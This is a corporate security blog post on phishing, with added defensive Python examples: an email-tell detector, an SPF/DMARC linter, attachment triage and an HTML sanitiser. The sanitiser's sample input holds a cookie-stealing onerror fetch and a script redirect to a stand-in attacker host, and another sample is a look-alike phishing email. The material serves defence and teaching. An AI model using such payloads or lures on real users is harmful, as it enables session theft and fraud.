Phishing: How to stop a malicious email in its tracks

01 Nov 2019

About the author

Yusuf Mustafa is a Cybersecurity Consultant at Arrow.

Based at Arrow’s Sydney office, Yusuf is passionate about protecting our way of life in the digital age by delivering security solutions that provide end user visibility and control.

Australian National University and regional hospitals and health care providers in Victoria are among the most recent to have fallen victim to a spate of significant data breaches. The breaches have one thing in common: they were all instigated by phishing attacks.

The Australian Cyber Security Centre has issued an alert on a widespread malware campaign known as Emotet: a Trojan delivered via emails carrying malicious attachments (typically Microsoft Office documents whose macros download the payload) or links to them.

Given this track record, it’s no surprise that phishing is the number-one choice for social engineers looking to gain a foothold.

So what is phishing, and why is it so successful? In this blog, I’ll demonstrate what a phishing attack looks like and how organisations can mitigate the risk.

Phishing: The cyber weapon of choice

Phishing is a social engineering technique in which cyber criminals use email as a weapon: a message crafted to trick the recipient into clicking a link, opening an attachment or handing over information such as credentials or payment details.

Having proven so successful, phishing has quickly spread beyond email to include VoIP and telephone calls (voice phishing, or vishing) and unsolicited text messages (SMS and instant messaging, or smishing). Attackers typically send messages that impersonate a trusted entity, borrowing a real person’s name or a real company’s branding.

Individuals are lured into either providing sensitive data or opening attachments that deliver malware, which in turn leads to system hijacking, ransomware, cryptocurrency mining and so on.

Thinking like a phisher

There are many tactics phishers use to execute their attacks. The first thing they’ll be looking for is knowledge. After all, knowledge is power.

Crafting the perfect phishing email

  1. Recon (reconnaissance). This is the first and most important step. A good social engineer spends a lot of time on recon: identifying exposed systems and their weaknesses, harvesting active email addresses, and matching those addresses to the real people and roles behind them.
  2. Education. The attacker then educates themselves about the target and how the company works. They’ll identify employees and contractors, learn who reports to whom, and will even go as far as identifying the causes the company supports, all of which makes the pretext believable.

Common phishing tricks

  1. Spoofing the sender (a trusted display name, or a From address on a look-alike domain)
  2. Spoofing website URLs (link text that shows one address while the link goes to another, or domains that imitate a brand)
  3. Cloning websites (a copy of a real login page that harvests the credentials typed into it)
  4. Human psychology (urgency, fear, authority and curiosity).
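The first, second and fourth tricks leave fingerprints in the message itself, which is what a mail filter or an analyst looks for. The following is an added example (not code from the original post or from Arrow) that parses a constructed sample email with Python’s standard library and flags a display name that imitates a brand the sender domain is not entitled to, anchor text whose domain differs from the real link target, a host that contains a brand name under an untrusted registrable domain, and pressure language. The brand allow-list, the confusable-character table and the sample message are assumptions made for the example.

```python
"""Flag common phishing tells in a raw email. Added example; the message,
the brand allow-list and the heuristics are constructed for illustration."""
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlsplit

# Constructed sample message: a look-alike sender domain, a link whose visible
# text differs from its target, and the usual "act now" pressure.
RAW_MESSAGE = b"""From: "PayPal Service" <security@paypa1-support.com>
To: victim@example.org
Subject: Your account will be suspended in 24 hours
Content-Type: text/html; charset=utf-8

<html><body>
<p>Urgent: verify your account immediately or it will be suspended.</p>
<p><a href="http://paypal.com.login-verify.xyz/auth">https://www.paypal.com/signin</a></p>
</body></html>
"""

# Constructed benign message for comparison: same brand, legitimate domain.
CLEAN_MESSAGE = b"""From: "PayPal" <service@paypal.com>
To: victim@example.org
Subject: Your monthly statement is available
Content-Type: text/html; charset=utf-8

<html><body><p>Your statement is ready.
<a href="https://www.paypal.com/signin">https://www.paypal.com/signin</a></p></body></html>
"""

# Assumed allow-list: brands the organisation deals with and their real domains.
TRUSTED_BRAND_DOMAINS = {"paypal": {"paypal.com"}}
URGENCY_PHRASES = ("urgent", "immediately", "suspended", "24 hours", "verify your account")
# Digit-for-letter swaps attackers use in look-alike domains (paypa1, g00gle).
CONFUSABLES = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s", "|": "l"})
ANCHOR_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
TAG_RE = re.compile(r"<[^>]+>")


def registrable_domain(host):
    """Crude eTLD+1 (last two labels); use a public-suffix library in production."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def brand_in(text):
    """Return the trusted brand a string imitates, after undoing confusable swaps."""
    norm = text.lower().translate(CONFUSABLES)
    return next((b for b in TRUSTED_BRAND_DOMAINS if b in norm), None)


def check_sender(msg):
    """Display name or address claims a brand, but the domain is not that brand's."""
    name, addr = parseaddr(str(msg["From"]))
    domain = addr.rpartition("@")[2]
    brand = brand_in(name) or brand_in(domain)
    if brand and registrable_domain(domain) not in TRUSTED_BRAND_DOMAINS[brand]:
        return [("SENDER_SPOOF", f"'{name}' <{addr}> imitates {brand} from {domain}")]
    return []


def check_links(html):
    """Visible URL text that disagrees with the href, and brand names in untrusted hosts."""
    findings = []
    for href, inner in ANCHOR_RE.findall(html):
        target_host = urlsplit(href).hostname or ""
        shown = TAG_RE.sub("", inner).strip()
        shown_host = urlsplit(shown).hostname if shown.lower().startswith(("http://", "https://")) else None
        if shown_host and registrable_domain(shown_host) != registrable_domain(target_host):
            findings.append(("LINK_MISMATCH", f"text shows {shown_host} but link goes to {target_host}"))
        brand = brand_in(target_host)
        if brand and registrable_domain(target_host) not in TRUSTED_BRAND_DOMAINS[brand]:
            findings.append(("LOOKALIKE_URL", f"{target_host} uses '{brand}' under {registrable_domain(target_host)}"))
    return findings


def check_urgency(text):
    """Two or more pressure phrases in subject plus body is a strong social-engineering tell."""
    hits = [p for p in URGENCY_PHRASES if p in text.lower()]
    return [("URGENCY", "pressure language: " + ", ".join(hits))] if len(hits) >= 2 else []


def analyse(raw):
    """Return a list of (code, detail) findings for a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body else ""
    text = str(msg["Subject"]) + " " + TAG_RE.sub(" ", html)
    return check_sender(msg) + check_links(html) + check_urgency(text)


if __name__ == "__main__":
    for code, detail in analyse(RAW_MESSAGE):
        print(f"{code:14} {detail}")
```

The heuristics are deliberately simple: a production filter would resolve registrable domains from the public suffix list, normalise Unicode homoglyphs rather than a handful of digits, and score rather than hard-flag. The point is that each of the listed tricks is mechanically detectable once the message is parsed instead of eyeballed.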

Phishing in action

Check out the following short video to see what happens during a phishing attack, from the attacker’s and the victim’s side.

Email security standards are just the beginning

Organisations can reduce the likelihood of a phishing attack through cybersecurity awareness training that puts people at the centre of the solution.

Check out this blog to learn how to go about this.

However, at the bare minimum, businesses of all sizes should have these technical controls in place:

  • Sender Policy Framework (SPF) records in DNS, listing the hosts allowed to send mail for the domain
  • Domain-based Message Authentication, Reporting and Conformance (DMARC) records in DNS, telling receivers what to do with mail that fails authentication and where to send reports
  • DomainKeys Identified Mail (DKIM) signing of outbound mail, so that DMARC has a signature to align on even when forwarding breaks SPF.
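The three controls only work together: SPF or DKIM alone tells a receiver whether a message is authentic for some domain, and DMARC is what ties that domain to the one in the From header the user actually sees. The following added example (not Arrow’s code or the original post’s) lints constructed SPF and DMARC records for the weaknesses that most often make them useless, and then evaluates DMARC for three scenarios the way a receiving mail server does: a spoof whose SPF passes for the attacker’s own domain, a forwarded legitimate message whose SPF fails but whose DKIM signature survives, and a domain with p=none. The domain names, TXT records and the tiny public-suffix table are assumptions for the example.

```python
"""Lint SPF/DMARC records and evaluate DMARC alignment. Added example;
all DNS records below are constructed, nothing is looked up."""

# Constructed TXT records for hypothetical domains (no real DNS queries).
TXT_RECORDS = {
    "example.com.au": "v=spf1 ip4:203.0.113.0/24 include:_spf.mailprovider.example -all",
    "_dmarc.example.com.au": "v=DMARC1; p=reject; rua=mailto:dmarc-rua@example.com.au; adkim=r; aspf=r; pct=100",
    "weak.example": "v=spf1 include:a.example include:b.example +all",
    "_dmarc.weak.example": "v=DMARC1; p=none",
}

# Mechanisms/modifiers that cost a DNS lookup; RFC 7208 caps these at 10.
SPF_LOOKUP_MECHS = ("include", "a", "mx", "ptr", "exists", "redirect")
# Tiny stand-in for the public suffix list, enough for the sample domains.
PUBLIC_SUFFIXES = {"com", "au", "com.au", "example"}


def org_domain(host):
    """Organisational domain: one label above the longest public suffix."""
    labels = host.lower().strip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[max(i - 1, 0):])
    return host.lower()


def lint_spf(record):
    """Return warnings for an SPF record: wrong version, too many lookups, permissive 'all'."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["not an SPF record"]
    lookups = sum(1 for t in terms[1:]
                  if t.lstrip("+-~?").split(":")[0].split("=")[0].lower() in SPF_LOOKUP_MECHS)
    warnings = []
    if lookups > 10:
        warnings.append(f"{lookups} DNS-querying mechanisms exceeds the limit of 10 (permerror)")
    final = terms[-1].lower()
    if final in ("all", "+all"):
        warnings.append("'+all' authorises every host on the internet to send as this domain")
    elif final == "?all":
        warnings.append("'?all' is neutral: spoofed mail is neither passed nor failed")
    elif final not in ("-all", "~all"):
        warnings.append("record does not end in an 'all' mechanism; default result is neutral")
    return warnings


def parse_dmarc(record):
    """Split 'tag=value; tag=value' into a dict (keys lower-cased)."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def lint_dmarc(record):
    """Return warnings for a DMARC record: monitor-only policy, no reporting, partial pct."""
    tags = parse_dmarc(record)
    if tags.get("v") != "DMARC1":
        return ["not a DMARC record"]
    warnings = []
    if tags.get("p", "none") == "none":
        warnings.append("p=none only monitors; spoofed mail is still delivered")
    if "rua" not in tags:
        warnings.append("no rua= address: you will not receive aggregate reports")
    if tags.get("pct", "100") != "100":
        warnings.append(f"pct={tags['pct']}: policy applies to only part of failing mail")
    return warnings


def aligned(auth_domain, from_domain, mode="r"):
    """Identifier alignment: strict (s) needs an exact match, relaxed (r) the same org domain."""
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def dmarc_verdict(from_domain, spf_result, spf_domain, dkim_result, dkim_domain, records):
    """'pass' if an aligned SPF or DKIM pass exists; otherwise the domain's requested disposition."""
    policy = parse_dmarc(records.get("_dmarc." + from_domain.lower(), ""))
    if policy.get("v") != "DMARC1":
        return "none"  # no DMARC record: receiver applies no DMARC policy
    spf_ok = spf_result == "pass" and aligned(spf_domain, from_domain, policy.get("aspf", "r"))
    dkim_ok = dkim_result == "pass" and aligned(dkim_domain, from_domain, policy.get("adkim", "r"))
    return "pass" if (spf_ok or dkim_ok) else policy.get("p", "none")


if __name__ == "__main__":
    for name, rec in TXT_RECORDS.items():
        print(name, lint_dmarc(rec) if name.startswith("_dmarc.") else lint_spf(rec))
    print(dmarc_verdict("example.com.au", "pass", "attacker.example", "none", "", TXT_RECORDS))
```

The spoof scenario is the one that surprises people: the attacker’s SPF genuinely passes, because they control the envelope sender domain, and only DMARC’s alignment check against the visible From domain turns that into a reject. Conversely the forwarded message shows why DKIM signing matters: SPF fails at the forwarder, and without an aligned DKIM signature your own legitimate mail would be rejected under p=reject.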

Arrow can help demystify the complexity in implementing these controls.

Talk to us today for support.

Advanced mitigation strategies

There is a wealth of information available on how to spot a phishing email. In general, it pays to look out for the following:

  • A sense of urgency or fear tactics (“your account will be suspended in 24 hours”)
  • Imitation of known brands
  • Sender addresses that do not belong to the claimed organisation
  • Hovering over a link reveals a destination different from the text shown
  • Incorrect or outdated copyright notices and footers
  • Unexpected attachments, in particular ZIP archives and PDFs, to name a few.

The following list offers more advanced mitigation strategies for the security risk posed by malicious emails.

Attachment filtering: convert attachments to another format (e.g. a Microsoft Word document to PDF), which renders the content and drops macros and other active elements in the process.

Whitelist attachments based on file typing: File typing inspects the content of a file to determine its file type rather than relying on its extension.

Block password-protected archives and unidentifiable or encrypted attachments: content within password-protected archives can’t be trusted, since email content filters can’t decrypt and inspect it.

Perform automated dynamic analysis of attachments run in a sandbox: Dynamic analysis uses behaviour-based detection capabilities instead of relying on the use of signatures, enabling organisations to detect malware that has yet to be identified by vendors.

Sanitise attachments to remove active or potentially harmful content: Active content, such as macros in Microsoft Office files and JavaScript, should be removed from within attachments before being delivered to users.

Disable or control macros in Microsoft Office files: macros in Microsoft Office files are a common malware delivery vector. These macros are written in the Visual Basic for Applications (VBA) programming language, a feature built into Microsoft Office applications. Macros are legitimately used for task automation, but adversaries also use them to perform a variety of malicious activities, including downloading and executing malware on the host computer.

Controlled inspection of archive files: Archive files can be used to bypass poorly configured email content filters. By placing a malicious file in an archive file and sending it to the target, the archive file might bypass content filtering checks.
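File typing, blocking password-protected archives, detecting Office macros and inspecting nested archives are four checks over the same attachment, so the following added example (not code from the original post or from Arrow) implements them as one triage function using only the standard library. Attachments are constructed in memory: a genuine PDF, an executable renamed to .pdf, a macro-free and a macro-bearing Office document (detected by the vbaProject.bin part inside the OOXML zip), a zip whose encryption flag has been set to simulate a password-protected archive, and a zip nested inside a zip that hides a macro document. The magic-byte table, the extension allow-list and the nesting limit are assumptions for the example.

```python
"""Attachment triage: file typing by content, encrypted-archive and macro
detection, recursive archive inspection. Added example with constructed files."""
import io
import zipfile

# Assumed magic-byte table (first bytes of the file -> content kind).
MAGIC = [
    (b"%PDF-", "pdf"),
    (b"MZ", "exe"),                                   # Windows PE
    (b"\x7fELF", "elf"),
    (b"PK\x03\x04", "zip"),                           # also OOXML: docx/xlsx/pptx
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),     # legacy doc/xls
    (b"Rar!\x1a\x07", "rar"),
]
# Assumed allow-list: extension -> the content kind it is permitted to carry.
EXT_TO_KIND = {"pdf": "pdf", "docx": "zip", "docm": "zip", "xlsx": "zip", "xlsm": "zip",
               "pptx": "zip", "zip": "zip", "doc": "ole", "xls": "ole"}
MAX_DEPTH = 2  # archives nested deeper than this are blocked rather than unpacked


def sniff(data):
    """Content kind from magic bytes, ignoring the file name entirely."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return None


def inspect_zip(filename, data, depth):
    """Encrypted entries, VBA parts in Office documents, and nested archives."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            infos = zf.infolist()
            if any(info.flag_bits & 0x1 for info in infos):  # bit 0 = entry is encrypted
                return [f"{filename}: password-protected archive cannot be inspected"]
            names = [info.filename for info in infos]
            if "[Content_Types].xml" in names:  # an OOXML document, not a plain archive
                if any(n.lower().endswith("vbaproject.bin") for n in names):
                    return [f"{filename}: Office document contains VBA macros"]
                return []
            if depth >= MAX_DEPTH:
                return [f"{filename}: archive nested deeper than {MAX_DEPTH} levels"]
            reasons = []
            for info in infos:
                if not info.is_dir():
                    reasons += triage(info.filename, zf.read(info), depth + 1)[1]
            return reasons
    except zipfile.BadZipFile:
        return [f"{filename}: corrupt or truncated archive"]


def triage(filename, data, depth=0):
    """Return ('allow' | 'block', [reasons]) for one attachment."""
    kind = sniff(data)
    if kind is None:
        return "block", [f"{filename}: unidentifiable content"]
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    reasons = []
    if EXT_TO_KIND.get(ext) != kind:
        reasons.append(f"{filename}: extension .{ext} is not allowed to carry {kind} content")
    if kind in ("exe", "elf"):
        reasons.append(f"{filename}: executable")
    if kind == "zip":
        reasons += inspect_zip(filename, data, depth)
    return ("block" if reasons else "allow"), reasons


# ---- constructed sample attachments -------------------------------------
def make_zip(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def make_ooxml(macro):
    """Minimal OOXML skeleton; real documents carry many more parts."""
    entries = {"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<w:document/>"}
    if macro:
        entries["word/vbaProject.bin"] = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16
    return make_zip(entries)


def mark_encrypted(zip_bytes):
    """Set the 'encrypted' flag bit in every local and central header to simulate a password-protected zip."""
    data = bytearray(zip_bytes)
    for sig, offset in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = data.find(sig)
        while pos != -1:
            data[pos + offset] |= 0x01
            pos = data.find(sig, pos + 1)
    return bytes(data)


SAMPLES = {
    "report.pdf": b"%PDF-1.7\n% constructed sample\n",
    "invoice.pdf": b"MZ\x90\x00" + b"\x00" * 60,                     # renamed executable
    "quote.docx": make_ooxml(macro=False),
    "quote.docm": make_ooxml(macro=True),
    "secure.zip": mark_encrypted(make_zip({"payload.txt": b"x"})),
    "bundle.zip": make_zip({"inner.zip": make_zip({"macro.docm": make_ooxml(macro=True)})}),
}


def triage_all(samples):
    return {name: triage(name, data)[0] for name, data in samples.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, *triage(name, data))
```

Note that the decision never trusts the extension: the renamed executable is caught because its content says PE regardless of the .pdf name, and the macro document inside two layers of archive is caught because archives are unpacked and each member re-enters the same triage. Real deployments also add an antivirus and sandbox pass on whatever survives these structural checks.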

Scan attachments using antivirus software: Attachments should be scanned using vendor-supported antivirus software with up-to-date signatures, reputation ratings and other heuristic detection capabilities.

Replace active web addresses in an email’s body with non-active versions: An active web address allows users to click on a hyperlink in the body of an email and be taken to a specified website. Active web addresses can appear to be safe but can actually direct users to a malicious website. Hovering over the address may reveal the actual website.

Remove active content in an email’s body: Emails with active content such as VBScript or JavaScript pose a security risk if the email client or web browser in organisations where web mail is utilised is capable of running the active content.
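The last two controls, replacing active links with non-active text and stripping active content, are both a rewrite of the HTML body before it reaches the mail client. The following added example (not the original post’s code or Arrow’s) does that with the standard-library HTML parser over a constructed message body: script, object, embed, iframe and form elements are dropped with their contents, on* event-handler attributes and javascript: URLs are removed, and every anchor is replaced by its own text followed by the real destination in defanged form (hxxp, dots bracketed) so the user can see where it led without being able to click it. The sample HTML and the list of element names treated as active are assumptions for the example.

```python
"""Rewrite an HTML email body: defang links, drop active content.
Added example; the sample body below is constructed."""
from html import escape
from html.parser import HTMLParser

ACTIVE_TAGS = {"script", "object", "embed", "iframe", "applet", "form"}  # assumed list
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link"}                  # never get an end tag

# Constructed sample: a disguised link, an image with an event handler that
# exfiltrates cookies, an inline script and a javascript: link.
SAMPLE_HTML = (
    '<html><body><p>Please <a href="http://paypal.com.login-verify.xyz/auth">review your account</a>.</p>'
    '<img src="https://cdn.example/logo.png" onerror="fetch(\'//evil.example/?c=\'+document.cookie)">'
    '<script>window.location="http://evil.example/"</script>'
    '<p><a href="javascript:alert(1)">Click here</a></p></body></html>'
)


def defang(url):
    """Make a URL non-clickable and safe to paste: hxxp scheme, bracketed dots."""
    return url.replace("https://", "hxxps://").replace("http://", "hxxp://").replace(".", "[.]")


class Sanitiser(HTMLParser):
    """Rebuilds the document, skipping active elements and neutralising links."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # output fragments
        self.skip = 0        # nesting depth inside an active element
        self.pending = []    # hrefs of anchors currently open
        self.links = []      # every href seen, for logging/analysis
        self.removed = 0     # count of elements, attributes and links neutralised

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.skip += 1
            self.removed += 1
            return
        if self.skip:
            return
        if tag == "a":
            self.pending.append(dict(attrs).get("href") or "")
            return  # the anchor itself is not re-emitted, only its text (see handle_endtag)
        kept = []
        for name, value in attrs:
            lowered = (value or "").strip().lower()
            if name.lower().startswith("on") or lowered.startswith(("javascript:", "vbscript:")):
                self.removed += 1
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ACTIVE_TAGS:
            self.skip = max(self.skip - 1, 0)
            return
        if self.skip:
            return
        if tag == "a":
            href = self.pending.pop() if self.pending else ""
            self.links.append(href)
            if href.strip().lower().startswith(("javascript:", "vbscript:")):
                self.removed += 1
                self.out.append(" [link removed]")
            elif href:
                self.out.append(f" [link: {defang(href)}]")
            return
        if tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))


def sanitise(html):
    """Return (rewritten_html, report) where report lists links seen and items removed."""
    parser = Sanitiser()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), {"links": parser.links, "removed": parser.removed}


if __name__ == "__main__":
    cleaned, report = sanitise(SAMPLE_HTML)
    print(cleaned)
    print(report)
```

Keeping the visible anchor text and appending the defanged target preserves the evidence of a mismatch (text says one thing, destination says another) for the user and for anyone reviewing a reported message, while ensuring that a click does nothing. The parser-based rewrite is preferable to regex stripping because the HTML parser resolves the same tag boundaries the mail client will.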

Companies are nearly three times more likely to get breached by social attacks than via actual vulnerabilities – Verizon 2018 DBIR report.

Given the success rate, it seems phishing shows no sign of slowing.

At Arrow, we deliver leading security technologies and end-to-end enablement to help channel partners take their security solutions to market.

Talk to us today to learn more about our security capabilities.